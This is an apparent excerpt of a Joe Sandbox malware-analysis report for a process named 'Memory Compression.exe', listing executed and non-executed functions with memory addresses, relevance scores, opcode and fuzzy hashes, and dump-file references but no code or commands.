Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d1382a8fdf476a6c6ff84183d97f6f7570c4c603f3a94e75bb355ef268a8f0
Instruction ID: fa97ad15e5b6100920745e5685269e58d047e4d2b37fbe15f92b3abb12b48c0a
Opcode Fuzzy Hash: b6d1382a8fdf476a6c6ff84183d97f6f7570c4c603f3a94e75bb355ef268a8f0
Instruction Fuzzy Hash: 7411BC3090DA4ACFEB98EF6888692B97AA0FF19344F0445BAD409C31A2DF74A4448741

Function 00007FF848E82ED1 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06cccaf9c74dd789ef33da5dbbad7179808d786ddebbd6af6b17f34c3baa68e1
Instruction ID: 7a877c99f095ecefab47b5797df07beaad7be61f8b37ebba8a1175d2c88d9260
Opcode Fuzzy Hash: 06cccaf9c74dd789ef33da5dbbad7179808d786ddebbd6af6b17f34c3baa68e1
Instruction Fuzzy Hash: 4D017830D1D64E8FE756FB2488496AD7BE0FF19381F8549B6D408D70A6EB38E144C704

Function 00007FF848E83595 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dca94ad751e79ba94abe94e1c2b1f69703d227f978293aed112414fc9a5dc1
Instruction ID: 9dcd6e064a03772026a3b56e3af3fc7e27179c148c3bfc3ed2c656499d762cea
Opcode Fuzzy Hash: 86dca94ad751e79ba94abe94e1c2b1f69703d227f978293aed112414fc9a5dc1
Instruction Fuzzy Hash: D611797090D68E8FEB89EB68C8592BD7BE0FF18341F8005BAD419C7192DF34A5408700

Function 00007FF848E805D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2583a1251c829dae31ebafa26daf85fb061eccdf69d3bd7499a5df67574e44c5
Instruction ID: 63d5384480981ee07c0fcd229df515a26718dec9ad67b0edfac0662f78cc132f
Opcode Fuzzy Hash: 2583a1251c829dae31ebafa26daf85fb061eccdf69d3bd7499a5df67574e44c5
Instruction Fuzzy Hash: C0012930A1890E9EEB88EF64C4556BD77A1FF58385F9044BED41EC3191CB36A550CB44

Function 00007FF848E97679 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e40f3976e2fb30c572598ad88aafdd500ace68a2ee96fc8b63657ee1708d13
Instruction ID: d0a0ae507b305cda9d9e990e56aec33e91bbfc94f039ca7444addc86bb36df2d
Opcode Fuzzy Hash: 83e40f3976e2fb30c572598ad88aafdd500ace68a2ee96fc8b63657ee1708d13
Instruction Fuzzy Hash: B2019E3091D68A5FE752BBB888496F97BE0FF1A385F0504F2D018C70A3EB78A4488715

Function 00007FF848E97C29 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb284bac1819ab3f7da3d575ae7b11cf8612bf2a378f3bc50dcb4c6cb51331f4
Instruction ID: 1de8bdcce88ade2bc8a15ec01a53b90da4d267bb762cb52a060d2fa15ccf6724
Opcode Fuzzy Hash: cb284bac1819ab3f7da3d575ae7b11cf8612bf2a378f3bc50dcb4c6cb51331f4
Instruction Fuzzy Hash: 0D018C3095D68AAFDB49EF6488A92BD3BB0FF19348F0104FAD409C61A2EF79A544C741

Function 00007FF848E8AC95 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f33dea50ec4ef004ceab5bec5dd302a32d1303f09d99c1b4b1349dc3ec621b1
Instruction ID: aeee0ad6c293528c7bc05e0758bd9e1c78b4c17e91c1ec0f83284194ce4bdecd
Opcode Fuzzy Hash: 3f33dea50ec4ef004ceab5bec5dd302a32d1303f09d99c1b4b1349dc3ec621b1
Instruction Fuzzy Hash: FB01A232A0D3826FD302E758D8914ED37B0FF82351B4945F3C148CB0A3EA28A44887A5

Function 00007FF848E97C9D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05168827a78c988e91d40ce3eecb47f4e3cdada8b898dcf46532501e2621b0e0
Instruction ID: e43759b6720713d06cbd0e6e5fea0033dedc0ec8e35fcad04d69bba4445d5b74
Opcode Fuzzy Hash: 05168827a78c988e91d40ce3eecb47f4e3cdada8b898dcf46532501e2621b0e0
Instruction Fuzzy Hash: 9B01D23090D649AFEB48EF6488596BA3BB0FF19348F0004BAD409C2192DF78A544C700

Function 00007FF848E81CA5 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39b4d1c4e9afdc6af009c678d374bed3221450120b4fa662e363cc1e7c366222
Instruction ID: 19f4cc575426f59c183a393a2cba76700d101a175efc6bd5e7227085e2a173aa
Opcode Fuzzy Hash: 39b4d1c4e9afdc6af009c678d374bed3221450120b4fa662e363cc1e7c366222
Instruction Fuzzy Hash: 1401817090DA8E8FEB98EF24D8592BD7BA0FF55341F9015BAE808C3191DB769450CB44

Function 00007FF848E82F49 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2d5dc4251696e95ad346f33fba62a3b949843b94510a58dbbc2930aac023ee
Instruction ID: 60708aec4b3a0452aceb1bc63dbbde7448e6a873a4d6ff15df339cc1b5aaad65
Opcode Fuzzy Hash: fa2d5dc4251696e95ad346f33fba62a3b949843b94510a58dbbc2930aac023ee
Instruction Fuzzy Hash: 72015A3095D6894FE752BB3488496A97BE0FF5A340F8605F6D409D70ABEB38A454C701

Function 00007FF848E828AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76654d21910d7ada4213895fa809cd5c19c899a306b63c19c07246709c54fc92
Instruction ID: 81db846552d149578a78a2afec1d8a69ce57707e3220e681235f553fac0c7b4d
Opcode Fuzzy Hash: 76654d21910d7ada4213895fa809cd5c19c899a306b63c19c07246709c54fc92
Instruction Fuzzy Hash: 34018B3095D64D9FEB41FB2488486B97BF0FF5A340F8145B2E408C70A2EF38A5948715

Function 00007FF848E92CAA Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3ad0bcecef04228dc8a6716017ee08ad8ca692574065592357131c1fbcc5d2
Instruction ID: 7c262e34bfb43ce10aa029377001816d94998c11dce7117a30d6156c9404257e
Opcode Fuzzy Hash: 2b3ad0bcecef04228dc8a6716017ee08ad8ca692574065592357131c1fbcc5d2
Instruction Fuzzy Hash: 20013571D0C50A9FEB58EFA4D4405FCBAF1FB48395F60013AD01AA3296DB7829448B18

Function 00007FF848E8AC29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15fc93b57ce624c67d113ef059d40ba89f150d8d78ee3d1cb36cf66570029749
Instruction ID: f2fadb083b0810d6474cc3cc293cb9587784c3dcd8e014e1063a6e49f6cdffd2
Opcode Fuzzy Hash: 15fc93b57ce624c67d113ef059d40ba89f150d8d78ee3d1cb36cf66570029749
Instruction Fuzzy Hash: B0017C3094D6896FE752FB3488591AD7BE0FF0A340F8509F6D408C70A2EB39A4849702

Function 00007FF848E80608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49e0a9864b88cae3dcac3d40f794b64fef9dcb5a547f2cc1336f84d5c963bd3
Instruction ID: 4b1b2424575410643abf7e0cf157309cfc9751bdd8291e071be40e82b80a9942
Opcode Fuzzy Hash: d49e0a9864b88cae3dcac3d40f794b64fef9dcb5a547f2cc1336f84d5c963bd3
Instruction Fuzzy Hash: 7301463091890E9EEB59EB2484492BD72A0FF18345F9008BEE40AC6192DF3AA150C654

Function 00007FF848E80610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd3b44786fe7282e00652634c3f0765d690a8b92e471c88895833a130c659e6
Instruction ID: e0552c9f6c50e61e8ec394cf9316680ab40d601585b6297533c918fe62d67460
Opcode Fuzzy Hash: 0fd3b44786fe7282e00652634c3f0765d690a8b92e471c88895833a130c659e6
Instruction Fuzzy Hash: 9301463091990E9EEF48FB6484492BD73A0FF19345F9008BEE80EC3192DF39A550C604

Function 00007FF848E8ACA8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0083f1f3f4d9c184f6fc41cb039a50e5d3a64def599bc8fddd1a20a1274441fe
Instruction ID: 2f8f8965ccd38f9af4d646cbaecdf24ee07bf15ae4244b0ac5168a65c0647a37
Opcode Fuzzy Hash: 0083f1f3f4d9c184f6fc41cb039a50e5d3a64def599bc8fddd1a20a1274441fe
Instruction Fuzzy Hash: 68F09036A4D5166FD211F65CE8D14FE33A1FF803A5B488A73D04C87053EE29A04886A9

Function 00007FF848E81140 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7adbc48dc8112109f46c03732521451f84f347ee79ee15734605af87360c8dbb
Instruction ID: 5763f0366f55f5fd9493259fbd725f9922fb353b45f3ea94d91c333795e172a5
Opcode Fuzzy Hash: 7adbc48dc8112109f46c03732521451f84f347ee79ee15734605af87360c8dbb
Instruction Fuzzy Hash: 23F0AF70D1DA1E8EFB98AB6898583FE77E0FF56291F4006BAD41AC31C1DF3511148644

Function 00007FF848E805D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69aa67b44bf70016563448c90acd6794b93301251c11c5741602f11a134d8db
Instruction ID: 2f8568492eb1f421a3b4d8aeb36844c8caa2997e309b66eabb13dffe684fc162
Opcode Fuzzy Hash: c69aa67b44bf70016563448c90acd6794b93301251c11c5741602f11a134d8db
Instruction Fuzzy Hash: 18F06D7091DA4E9FEB88EE64D4152FE77A4FF15385F94447AE80DC3181CB36A560CB88

Function 00007FF848E827C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7c81f48aceed244c1b117304804e34155907db9ac44bb2b9d1c2958eb7df40
Instruction ID: 076d9d5bb644687fe4dc44d9558a9759a20e53864ed937762154909c06d13829
Opcode Fuzzy Hash: db7c81f48aceed244c1b117304804e34155907db9ac44bb2b9d1c2958eb7df40
Instruction Fuzzy Hash: 3EF04F3180E7898FEB5AAF2488191A93BB0FF06241F4504BAD409CA1D3DB399854C751

Function 00007FF848E8283D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e80000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7daad1123a279640263d5adc492f58396609038a74f05b361d65fc851c8c4ec7
Instruction ID: 6f78387e14c629a7216eff43a3108ff62f3854e30201b044a6af3ce936d39039
Opcode Fuzzy Hash: 7daad1123a279640263d5adc492f58396609038a74f05b361d65fc851c8c4ec7
Instruction Fuzzy Hash: B4F0903091E6898FEF59AF2484192AD3BA0FF16341F8504BED809C60D2DB389450C701

Function 00007FF848E92C7D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction ID: 5f8ac2105bd96f9dc2f8fd909b468253d56112f42ac45e1147db6b089e008f34
Opcode Fuzzy Hash: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction Fuzzy Hash: ABF0F831D0860A8FEB94FB94C485AECB3F1FB59344F60017AC00AE7292CF786944CB44

Function 00007FF848E954FB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c308f5acac97954e7fe6b88ec096a1d98b0c7e95b9ff5cf97342e7f45476c25d
Instruction ID: f8d420326c6052da5ceb879595b215303fb2d298cb485252a38d918b3ec3f110
Opcode Fuzzy Hash: c308f5acac97954e7fe6b88ec096a1d98b0c7e95b9ff5cf97342e7f45476c25d
Instruction Fuzzy Hash: B1D0C972D18E194EE784EE5894893BCAAE1FB59644F80442AC108D3181DF3054155654

Non-executed Functions

Function 00007FF848E914B4 Relevance: 7.6, Strings: 6, Instructions: 76COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848E914E6
/, xrefs: 00007FF848E91AA5
+, xrefs: 00007FF848E911EE
/, xrefs: 00007FF848E91B03
., xrefs: 00007FF848E91531
{, xrefs: 00007FF848E911E1

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e91000_Memory Compression.jbxd

Similarity

API ID:
String ID: $+$.$/$/${
API String ID: 0-3160744145
Opcode ID: 7530918a15830a2246d7579d4cf94a97c100dd1498990452f84d24d5f8eae8a1
Instruction ID: e6d01cccc9a0aac790b96e5392ff5164352075ffddf74ad5651ac5746cef3d3e
Opcode Fuzzy Hash: 7530918a15830a2246d7579d4cf94a97c100dd1498990452f84d24d5f8eae8a1
Instruction Fuzzy Hash: 1531A370D082298FEB68DF94C9547EDB7B1BF48355F1044A9C00AAB290DBB95A84CF48

Function 00007FF848E8F6C5 Relevance: 6.3, Strings: 5, Instructions: 54COMMON

Download Yara Rule

Strings

B, xrefs: 00007FF848E8F76F
[, xrefs: 00007FF848E8F766
k, xrefs: 00007FF848E8FF0D
], xrefs: 00007FF848E8F6FC
M, xrefs: 00007FF848E8F731

Memory Dump Source

Source File: 00000023.00000002.2230094242.00007FF848E8F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E8F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848e8f000_Memory Compression.jbxd

Similarity

API ID:
String ID: B$M$[$]$k
API String ID: 0-4258210364
Opcode ID: 878ed7812e896b9e84a1b51c58ca43b850f58a9df0a34dfe6ceacadd787eefd2
Instruction ID: 08fde23fb2331200869483b69d8239cb5b11df0c88d3b9f49960f97576a0f261
Opcode Fuzzy Hash: 878ed7812e896b9e84a1b51c58ca43b850f58a9df0a34dfe6ceacadd787eefd2
Instruction Fuzzy Hash: FE212770D1962A8FEB68DF10C8807EEB7B1FB55341F4081A9D40E97281DB386A84CF84

Analysis Process: Memory Compression.exePID: 5968, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E7F0A6 Relevance: 7.6, Strings: 6, Instructions: 97COMMON

Download Yara Rule

Strings

k, xrefs: 00007FF848E7FF0D
_, xrefs: 00007FF848E7F0C8
Y, xrefs: 00007FF848E7F949
\, xrefs: 00007FF848E7F0BB
8, xrefs: 00007FF848E7F633
%, xrefs: 00007FF848E7F971

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7f000_Memory Compression.jbxd

Similarity

API ID:
String ID: %$8$Y$\$_$k
API String ID: 0-2256862889
Opcode ID: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction ID: e2552c7824b96f86cac2ff68daeb7d1fb375b33111b8a30cea26925a4aa63329
Opcode Fuzzy Hash: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction Fuzzy Hash: 5F41D470D0866A8FEB68EF54D8887EDB7B1BF44745F0041EAD40DA6281CB386AC4CF14

Function 00007FF848E81AE1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848E81AA5

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a947a4afbc336c3fcbf3ef9741b83b781f5d159aea0351a8fe8fc92c730e6d72
Instruction ID: 108eb5888289a8e1611c5e2dd04b2b35ddf2f2e429effbfc3f655ff47e3f2b27
Opcode Fuzzy Hash: a947a4afbc336c3fcbf3ef9741b83b781f5d159aea0351a8fe8fc92c730e6d72
Instruction Fuzzy Hash: 8FF05830D09309CFEB15EF94C9507EDB3F1FB10341F540266C0099B294DB79AA84DB48

Function 00007FF848E81649 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848E81AA5

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 85c5c948dd29ae263d44ff7f7292cb586a8a18562aa7d4cd31da42c4b4435c69
Instruction ID: eec98d497d4424d9f520db374223b4ad0daf546ee12e66f51cad7d32163b8cd1
Opcode Fuzzy Hash: 85c5c948dd29ae263d44ff7f7292cb586a8a18562aa7d4cd31da42c4b4435c69
Instruction Fuzzy Hash: 1CE09A30A0930DCFEB14EF54C9506ED73F1FB54301F140266C009DB294EB78AA40CB84

Function 00007FF848E8D561 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f8c5af1db8520792eb6235fedf3695e839f94c2ec4e9774a58add36fbce7ee
Instruction ID: 8d04198db20cb5b2a67363a1fe6960983157785e87d10278293e68ccd34e494a
Opcode Fuzzy Hash: b5f8c5af1db8520792eb6235fedf3695e839f94c2ec4e9774a58add36fbce7ee
Instruction Fuzzy Hash: A9528170D1891D9FEBA9EB58C899BEDB7B1FB58340F5041E9940DE3292DF346A808F44

Function 00007FF848E7DA99 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1934904945f8e6c6aaf7836adeacbb9d81427e89256c2d69eb337eecb4ceed8
Instruction ID: 6cd067c1f87d42b000ccf9ede03a97dbf997dc20f3060eb63ee7a76b6e35e45f
Opcode Fuzzy Hash: b1934904945f8e6c6aaf7836adeacbb9d81427e89256c2d69eb337eecb4ceed8
Instruction Fuzzy Hash: D7E14D30E1995ADFEB98EB68C4557B8B7B1FF58340F0441BAD00DE7296CB38A880CB55

Function 00007FF848E71698 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf38d7a5afbc4b0b01a18b2327359cccbe8cba7ca9d1e8828254b69b3d04eef0
Instruction ID: 3a96cc3156206b0d04ee6934a5f6c87ef66405facdb905489abf451007aee2da
Opcode Fuzzy Hash: bf38d7a5afbc4b0b01a18b2327359cccbe8cba7ca9d1e8828254b69b3d04eef0
Instruction Fuzzy Hash: 7581BE31A0CB8A8FDB98EE1C88555B977E2FF99741F14417AE44DC3286CF35AC028785

Function 00007FF848E82AA1 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd3137a33da7f7e5f7756eac4393666ab0f90774672c58b0c0b51e3451abe87
Instruction ID: 86a9e8f526e82879bf94abd1606cc684d3d9f32167496ef221a3892bbb6a9fd0
Opcode Fuzzy Hash: 6bd3137a33da7f7e5f7756eac4393666ab0f90774672c58b0c0b51e3451abe87
Instruction Fuzzy Hash: F891A170D18A1D9EEBA4EBA8C8957BDB7B1FF58340F5041AAD40DE3292DF3469848B44

Function 00007FF848E706C0 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e70000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a102f48566fc8794a1d93b8eea7a28c477ee9be5375f38d96b50ca530dff5d9e
Instruction ID: ee77ca81e67ecfd79b580c6b9596c45a4d961ba2b6281ff8456c223bf375c300
Opcode Fuzzy Hash: a102f48566fc8794a1d93b8eea7a28c477ee9be5375f38d96b50ca530dff5d9e
Instruction Fuzzy Hash: 49613852D4E9C64FF215B6BC68191B96BD0FF527A0F0941F7D048D70DBEE3898068389

Function 00007FF848E83D35 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87da8ac6a2c77ce79f37abd4c459729bed6b624ae782568cfeb05f7f6d44bb09
Instruction ID: 56a3ad1987c7e991f5d06914c07a22557fac47d29aa53aac19b9bd62ae0f7366
Opcode Fuzzy Hash: 87da8ac6a2c77ce79f37abd4c459729bed6b624ae782568cfeb05f7f6d44bb09
Instruction Fuzzy Hash: 8191C570D08A1D9EEB94EB68C8957ECB7B1FF58341F9051AAD00DE3292DB3869848B05

Function 00007FF848E8FD69 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E81000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e81000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de164a2732402d5aa632cf20de710ea35196a14447bae13a3b1b076b2365f1b
Instruction ID: ff5f3cc33161bed1517f0f530923ea83dbac9a7eda7ea5acab1b32e3c4e6e644
Opcode Fuzzy Hash: 6de164a2732402d5aa632cf20de710ea35196a14447bae13a3b1b076b2365f1b
Instruction Fuzzy Hash: 48710770D1CA1D8FEB95EBA8D4556ADB7B1FF59340F90007AD409E3282DF3868818B55

Function 00007FF848E7AF38 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2245500800.00007FF848E7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E7A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848e7a000_Memory Compression.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010468e777dfafe17c42b03f17e6d5806fb9ee484ec8c06db3ed245d05141d6c
Instruction ID: 27c1c78695f62d34efe83c11252a1809826fbe6458e43a9910cfa5d58d5fb73a
Opcode Fuzzy Hash: 010468e777dfafe17c42b03f17e6d5806fb9ee484ec8c06db3ed245d05141d6c
Instruction Fuzzy Hash: 4F61E270E1C91E8EEB94EBA9D855AEDB7F5FB59340F50017AD00DE3281DF3468819B48

Function 00007FF848E71D2D Relevance: .2, Instructions: 185COMMON

